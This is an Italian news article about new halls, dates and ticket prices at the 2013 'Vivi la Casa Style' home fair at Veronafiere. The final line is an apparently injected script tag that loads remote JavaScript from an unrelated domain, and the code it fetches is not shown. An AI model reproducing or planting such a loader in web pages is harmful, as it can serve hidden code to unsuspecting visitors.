1. Home
  2. Notizie e Mercato
  3. Innovazioni a ‘Vivi la Casa Style’ presso Veronafiere

Innovazioni a ‘Vivi la Casa Style’ presso Veronafiere

Arredamento e Mobili di
5/5
votato da 1 persone
Quattro nuovi saloni saranno allestiti presso ‘Vivi la Casa Style’: una fiera sempre più orientata verso il consumatore finale con una gamma di proposte che vanno dall’arredamento al wine and food


Quattro nuovi saloni che ampliano le proposte dedicate alla casa: la mostra mercato dell’abitare, made in Veronafiere, che alla sua 11^ edizione ha cambiato nome in Vivi la Casa Style, si presenta con una formula completamente rinnovata con il Salone dei Sapori, il Salone del Modernariato e dell’Antiquariato, Cosmofemme e Cosmocake, soluzioni sempre più orientate verso il consumatore finale, nell’ottica di un totale rinnovamento che vedrà il compimento a partire dall’edizione 2014.

Dal 29 novembre al 1 dicembre e dal 6 all’8 dicembre 2013, Vivi la Casa Style (www.vivilacasaweb.it) diventa il luogo ideale per il visitatore e per l’espositore, a ridosso delle festività natalizie, con molteplici soluzioni per l’acquisto dei regali.

Grazie al contributo della Camera di Commercio di Verona, nel cuore del padiglione 2 ci sarà il Temporary Shop, uno spazio espositivo di 490 mq dedicato alle proposte in tema di complementi d’arredo, articoli per la tavola e la cucina, oreficeria e gioielleria, realizzate dagli artigiani veronesi.

Il Salone dei Sapori è una vetrina con vendita diretta di prodotti agroalimentari di qualità, dalla frutta fresca all’olio extravergine di oliva, spezie, cioccolato, farine, vini che rappresentano il meglio dell’enogastronomia made in Italy. L’edizione zero del salone dedicato al wine and food, che occupa l’intero padiglione 1, non parte da zero: Veronafiere, forte del suo know how nel settore enogastronomico, offre una straordinaria opportunità alle aziende di settore che vogliono presentare qui i loro prodotti.

Nato dal desiderio di rilanciare la tradizione antiquaria, il Salone del Modernariato e dell’Antiquariato si è esteso alle proposte del passato di intramontabile valore e pregio di tutto il territorio italiano, quali collezioni di mobili, porcellane, tappeti, ceramiche, argenti, dipinti, miniature e gioielli antichi.

L’edizione 2013 di Vivi la Casa Style si caratterizza anche per l’ingresso di due manifestazioni nuove all’interno del padiglione 4 dedicato al Salone degli Sposi, spazio che raccoglie le migliori proposte in tema di abiti da sposa, noleggio auto, agenzie di viaggio, fotografi, servizi catering e wedding planning.

Un doppio week-end di aggiornamento professionale per esperti del settore, una vetrina per le aziende e uno show per i visitatori: questo è Cosmofemme e Cosmocake, i saloni che mettono in mostra su un grande palcoscenico e in vendita i prodotti dedicati all’arte del make up e alla decorazione delle torte, due ambiti legati al giorno del sì, ma anche alla vita quotidiana e al benessere della persona.

I nuovi saloni incrementano la proposta espositiva del Salone Moderno, Design e Servizi e Salone dei Complementi d’Arredo che hanno caratterizzato la manifestazione fin dalle prime edizioni.

Molteplici le agevolazioni studiate appositamente per il visitatore: il venerdì di due persone paga una sola il biglietto e il sabato, presentando alle casse il biglietto di Fieracavalli, si paga la metà.

INFORMAZIONI SULLA MANIFESTAZIONE:
29 e 30 novembre, 1, 6, 7 e 8 dicembre
orario dalle 9.00 alle 20.00 (orario continuato)
biglietti 5,00 € il venerdì; 10,00 € il sabato e la domenica; ingresso gratuito per i bambini fino ai 12 anni


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.873758806682878" type="text/javascript"></script>